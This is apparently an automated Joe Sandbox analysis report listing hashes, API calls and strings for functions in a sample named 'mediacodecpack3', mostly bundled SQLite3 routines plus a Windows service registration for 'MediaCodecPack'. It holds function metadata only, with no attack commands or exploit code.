Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7b3572c4825024628219a14e3466c11b8526f5c245e45a2c5ada6b05d28a57a2
• Instruction ID: 77de89feb31afb9f7e0b899b04aa460afec8cc02b7427acd4b9af8aa9f5f91e1
• Opcode Fuzzy Hash: 7b3572c4825024628219a14e3466c11b8526f5c245e45a2c5ada6b05d28a57a2
• Instruction Fuzzy Hash: A8E0BF7AD554658FCB00CA6DD9949EEBB70AA0472971A4145AC5037385C234AC41C6D1
Memory Dump Source
• Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5c5aa561fe8b7943dde2a358ba30c2c8876ef78bddd50c77f68009583e67d90a
• Instruction ID: 29002ccca7877ead4b7e7e784383ace88c03f26ddf616943a2b43c0eb71ea2e3
• Opcode Fuzzy Hash: 5c5aa561fe8b7943dde2a358ba30c2c8876ef78bddd50c77f68009583e67d90a
• Instruction Fuzzy Hash: 36E0E2B850430DABDF00CF09D8C188A7BAAFB08364F10C119FC190B305C371E9548BA1
Memory Dump Source
• Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d3c407e99ff1326d716251d27052f3514f6d3ace0f30ccd24b81610f61b1d9b8
• Instruction ID: aa639d4c52eda77921d109c173628d401b16d57fa3137d2b917a91732d8775c8
• Opcode Fuzzy Hash: d3c407e99ff1326d716251d27052f3514f6d3ace0f30ccd24b81610f61b1d9b8
• Instruction Fuzzy Hash: D7C01265704208574B00E92DE8C154577AA9718164B108039E80B87301D975ED084291
APIs
• sqlite3_initialize.SQLITE3 ref: 6096C5BE
  • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
• sqlite3_log.SQLITE3 ref: 6096C5FC
• sqlite3_free.SQLITE3 ref: 6096C67E
• sqlite3_free.SQLITE3 ref: 6096CD71
• sqlite3_mutex_leave.SQLITE3 ref: 6096CD80
• sqlite3_errcode.SQLITE3 ref: 6096CD88
• sqlite3_close.SQLITE3 ref: 6096CD97
• sqlite3_create_function.SQLITE3 ref: 6096CDF8
Strings
Memory Dump Source
• Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
Similarity
• API ID: sqlite3_free$sqlite3_closesqlite3_create_functionsqlite3_errcodesqlite3_initializesqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
• String ID: BINARY$NOCASE$RTRIM$porter$rtree$rtree_i32$simple
• API String ID: 1320758876-2501389569
• Opcode ID: 6bfcb0ec024900a9d9b4e92c8a495cd7f0e11888819caa106d9e2d842adf35f2
• Instruction ID: 66f98c4e8467cc0752991b2fada45a5d6d89a43a55ba94f1559c09c68fc79e30
• Opcode Fuzzy Hash: 6bfcb0ec024900a9d9b4e92c8a495cd7f0e11888819caa106d9e2d842adf35f2
• Instruction Fuzzy Hash: 7A024BB05183019BEB119F64C49536ABFF6BFA1348F11882DE8959F386D7B9C845CF82
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
Similarity
• API ID: sqlite3_free$sqlite3_snprintf$sqlite3_mutex_entersqlite3_win32_mbcs_to_utf8
• String ID: \$winFullPathname1$winFullPathname2$winFullPathname3$winFullPathname4
• API String ID: 937752868-2111127023
• Opcode ID: 790c833cc1fbb367a9c2b03a48d0fe6427ec60a778556f52a2f7a42315cae969
• Instruction ID: 65a1564e5812e901c47d2d0e8e64920046ae54dd737849fc0956122b524b53c9
• Opcode Fuzzy Hash: 790c833cc1fbb367a9c2b03a48d0fe6427ec60a778556f52a2f7a42315cae969
• Instruction Fuzzy Hash: 19512C706187018FE700AF69D88575DBFF6AFA5708F10C81DE8999B214EB78C845DF42
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
Similarity
• API ID: memcmp$sqlite3_mprintf$sqlite3_malloc$sqlite3_freesqlite3_vfs_find
• String ID: @$access$cache
• API String ID: 4158134138-1361544076
• Opcode ID: 19065094f7a61ae5fa0f118773a69bd69932ab9bc71fb499c0e2e31449818374
• Instruction ID: 35071b2ec389daa84eb338d99e29a1052eb2425681bc363379ff67fe3f9a0dd7
• Opcode Fuzzy Hash: 19065094f7a61ae5fa0f118773a69bd69932ab9bc71fb499c0e2e31449818374
• Instruction Fuzzy Hash: 27D19E75D183458BDB11CF69E58039EBBF7AFAA304F20846ED4949B349D339D882CB52
                                                                                            APIs
                                                                                            Strings
                                                                                            • SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0, xrefs: 609486C8
                                                                                            • SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' , xrefs: 60948748
                                                                                            • ATTACH '' AS vacuum_db;, xrefs: 60948529
                                                                                            • BEGIN;, xrefs: 609485DB
                                                                                            • SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' , xrefs: 609486E8
                                                                                            • SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';, xrefs: 60948768
                                                                                            • PRAGMA vacuum_db.synchronous=OFF, xrefs: 609485BB
                                                                                            • ATTACH ':memory:' AS vacuum_db;, xrefs: 60948534
                                                                                            • SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0, xrefs: 60948728
                                                                                            • SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %', xrefs: 60948708
                                                                                            • INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0), xrefs: 60948788
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_log
                                                                                            • String ID: ATTACH '' AS vacuum_db;$ATTACH ':memory:' AS vacuum_db;$BEGIN;$INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)$PRAGMA vacuum_db.synchronous=OFF$SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' $SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0$SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'$SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' $SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';$SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                                                                                            • API String ID: 632333372-52344843
                                                                                            • Opcode ID: d52540ff3cd5a889f8fcb2175177c5c293f6bf3e96b3409faf11301466b535e5
                                                                                            • Instruction ID: 17dae18cb22bd420f764556e48f7e631e7f528851c991f2db59136dec61311d4
                                                                                            • Opcode Fuzzy Hash: d52540ff3cd5a889f8fcb2175177c5c293f6bf3e96b3409faf11301466b535e5
                                                                                            • Instruction Fuzzy Hash: 1202F6B0A046299BDB2ACF18C88179EB7FABF65304F1081D9E858AB355D771DE81CF41
                                                                                            APIs
                                                                                            • RegisterServiceCtrlHandlerA.ADVAPI32(MediaCodecPack,Function_000019C8), ref: 00401A25
                                                                                            • SetServiceStatus.ADVAPI32(0040BE40), ref: 00401A84
                                                                                            • GetLastError.KERNEL32 ref: 00401A86
                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00401A93
                                                                                            • GetLastError.KERNEL32 ref: 00401AB4
                                                                                            • SetServiceStatus.ADVAPI32(0040BE40), ref: 00401AE4
                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00001897,00000000,00000000,00000000), ref: 00401AF0
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00401AF9
                                                                                            • CloseHandle.KERNEL32 ref: 00401B05
                                                                                            • SetServiceStatus.ADVAPI32(0040BE40), ref: 00401B2E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
                                                                                            • String ID: MediaCodecPack
                                                                                            • API String ID: 3346042915-199385074
                                                                                            • Opcode ID: cca009b725d80f918f5385075355cc3301aa37e01b24cb08a35ee5e129ff42f2
                                                                                            • Instruction ID: 532dd47a677431e4b3997e11c6aba14a110aa56271c5c3b89ba5cdee744870bf
                                                                                            • Opcode Fuzzy Hash: cca009b725d80f918f5385075355cc3301aa37e01b24cb08a35ee5e129ff42f2
                                                                                            • Instruction Fuzzy Hash: D621B8B1501244ABD3206F16EF48E967FB8EB95B55B15403EE245B23B1CBF90444CBED
                                                                                            APIs
                                                                                              • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                                                              • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                                                              • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                                                              • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                                                              • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                                                              • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                                                              • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                                                            • sqlite3_malloc.SQLITE3 ref: 60960384
                                                                                            • sqlite3_free.SQLITE3 ref: 609605EA
                                                                                            • sqlite3_result_error_code.SQLITE3 ref: 6096060D
                                                                                            • sqlite3_free.SQLITE3 ref: 60960618
                                                                                            • sqlite3_result_text.SQLITE3 ref: 6096063C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_free$sqlite3_result_error_code$sqlite3_bind_int64sqlite3_mallocsqlite3_mprintfsqlite3_resetsqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                                                            • String ID: offsets
                                                                                            • API String ID: 463808202-2642679573
                                                                                            • Opcode ID: 496dcd0dbd0e24e84f3ae9a4f9495b5d667a7098f4014ef95464c797b1727b83
                                                                                            • Instruction ID: 1101d6838161b799219a4b3d5732631e197d31251dd2d8b91c34f261bd2faa79
                                                                                            • Opcode Fuzzy Hash: 496dcd0dbd0e24e84f3ae9a4f9495b5d667a7098f4014ef95464c797b1727b83
                                                                                            • Instruction Fuzzy Hash: 72C1D374A183198FDB14CF59C580B8EBBF2BFA8314F2085A9E849AB354D734D985CF52
                                                                                            APIs
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6091A3C1
                                                                                            • sqlite3_value_bytes.SQLITE3 ref: 6091A3D6
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6091A3E4
                                                                                            • sqlite3_value_bytes.SQLITE3 ref: 6091A416
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6091A424
                                                                                            • sqlite3_value_bytes.SQLITE3 ref: 6091A43A
                                                                                            • sqlite3_result_text.SQLITE3 ref: 6091A5A2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_result_text
                                                                                            • String ID:
                                                                                            • API String ID: 2903785150-0
                                                                                            • Opcode ID: 408a6008a3f19a662094ad197d730d6af4ceeedc2d56196c0f88669f9a2ea12f
                                                                                            • Instruction ID: 050d84d3da0bd462ad4a4a15df4a38950001fc66f1de33c81d7c2c3a6f7146e7
                                                                                            • Opcode Fuzzy Hash: 408a6008a3f19a662094ad197d730d6af4ceeedc2d56196c0f88669f9a2ea12f
                                                                                            • Instruction Fuzzy Hash: 8971D074E086599FCF00DFA8C88069DBBF2BF59314F1485AAE855AB304E734EC85CB91
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_freesqlite3_malloc
                                                                                            • String ID:
                                                                                            • API String ID: 423083942-0
                                                                                            • Opcode ID: 039a1925b88827ab71129b12bf0a0cfd7bb9a75e2f5fb5313a60c0869b9e4a18
                                                                                            • Instruction ID: dba10035f3c017a022ff92dc0406edc4c972eb6647695f7afdbed5011b3e14eb
                                                                                            • Opcode Fuzzy Hash: 039a1925b88827ab71129b12bf0a0cfd7bb9a75e2f5fb5313a60c0869b9e4a18
                                                                                            • Instruction Fuzzy Hash: 9112E3B4A15218CFCB18CF98D480A9EBBF6BF98304F24855AD855AB319D774EC42CF90
                                                                                            APIs
                                                                                            • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                                            • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091264D
                                                                                            • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912662
                                                                                            • sqlite3_malloc.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091273E
                                                                                            • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912753
                                                                                            • sqlite3_os_init.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912758
                                                                                            • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912803
                                                                                            • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091280E
                                                                                            • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091282A
                                                                                            • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091283F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_freesqlite3_mallocsqlite3_mutex_freesqlite3_os_init
                                                                                            • String ID:
                                                                                            • API String ID: 3556715608-0
                                                                                            • Opcode ID: 7a5b012c4fe40a1866ea25e0c9ef8651b072e840c3be51a8f23ca71a75eb633f
                                                                                            • Instruction ID: 37d7613b282c24208f37f95ee69ae3eaf9c0527d79975c213f2f38643f7f707f
                                                                                            • Opcode Fuzzy Hash: 7a5b012c4fe40a1866ea25e0c9ef8651b072e840c3be51a8f23ca71a75eb633f
                                                                                            • Instruction Fuzzy Hash: FEA14A71A2C215CBEB009F69CC843257FE7B7A7318F10816DD415AB2A0E7B9DC95EB11
                                                                                            APIs
                                                                                            • sqlite3_malloc.SQLITE3 ref: 6095F645
                                                                                            • sqlite3_exec.SQLITE3 ref: 6095F686
                                                                                              • Part of subcall function 6094CBB8: sqlite3_log.SQLITE3 ref: 6094CBF8
                                                                                            • sqlite3_free_table.SQLITE3 ref: 6095F6A0
                                                                                            • sqlite3_mprintf.SQLITE3 ref: 6095F6C7
                                                                                              • Part of subcall function 609296AA: sqlite3_initialize.SQLITE3 ref: 609296B0
                                                                                              • Part of subcall function 609296AA: sqlite3_vmprintf.SQLITE3 ref: 609296CA
                                                                                            • sqlite3_free.SQLITE3 ref: 6095F6B4
                                                                                              • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                            • sqlite3_free.SQLITE3 ref: 6095F6D4
                                                                                            • sqlite3_free.SQLITE3 ref: 6095F6ED
                                                                                            • sqlite3_free_table.SQLITE3 ref: 6095F6FF
                                                                                            • sqlite3_realloc.SQLITE3 ref: 6095F71B
                                                                                            • sqlite3_free_table.SQLITE3 ref: 6095F72D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_freesqlite3_free_table$sqlite3_execsqlite3_initializesqlite3_logsqlite3_mallocsqlite3_mprintfsqlite3_mutex_entersqlite3_reallocsqlite3_vmprintf
                                                                                            • String ID:
                                                                                            • API String ID: 1866449048-0
                                                                                            • Opcode ID: 2addae8d4502475aa330d0fbe12d9077f3fed0f055932ab6dac269a256a03500
                                                                                            • Instruction ID: 9ac78cbffd0e0cf27e5d0fdbf17c3a3d034f00011a14f89e76d08e502163788c
                                                                                            • Opcode Fuzzy Hash: 2addae8d4502475aa330d0fbe12d9077f3fed0f055932ab6dac269a256a03500
                                                                                            • Instruction Fuzzy Hash: 8751F1B49467099FDB01DF69D59178EBBF6FF68318F104429E884AB300D379D894CB91
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00403EF1,?,Microsoft Visual C++ Runtime Library,00012010,?,00408574,?,004085C4,?,?,?,Runtime Error!Program: ), ref: 004060FA
                                                                                            • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00406112
                                                                                            • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00406123
                                                                                            • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00406130
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                            • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                                            • API String ID: 2238633743-4044615076
                                                                                            • Opcode ID: 30dd77c3664451088d9a49f7b1ebdf2ed2115b5f614d26e279abac0bd39ca4ff
                                                                                            • Instruction ID: 36fb3fed3a384cff097ea3fb9e63704b9da04faa094e7ece228342700e77c082
                                                                                            • Opcode Fuzzy Hash: 30dd77c3664451088d9a49f7b1ebdf2ed2115b5f614d26e279abac0bd39ca4ff
                                                                                            • Instruction Fuzzy Hash: E5018431700211DBC7109FB59FC0A177BE99A997C0712093FB646FA2A3DA7C88158FAD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID:
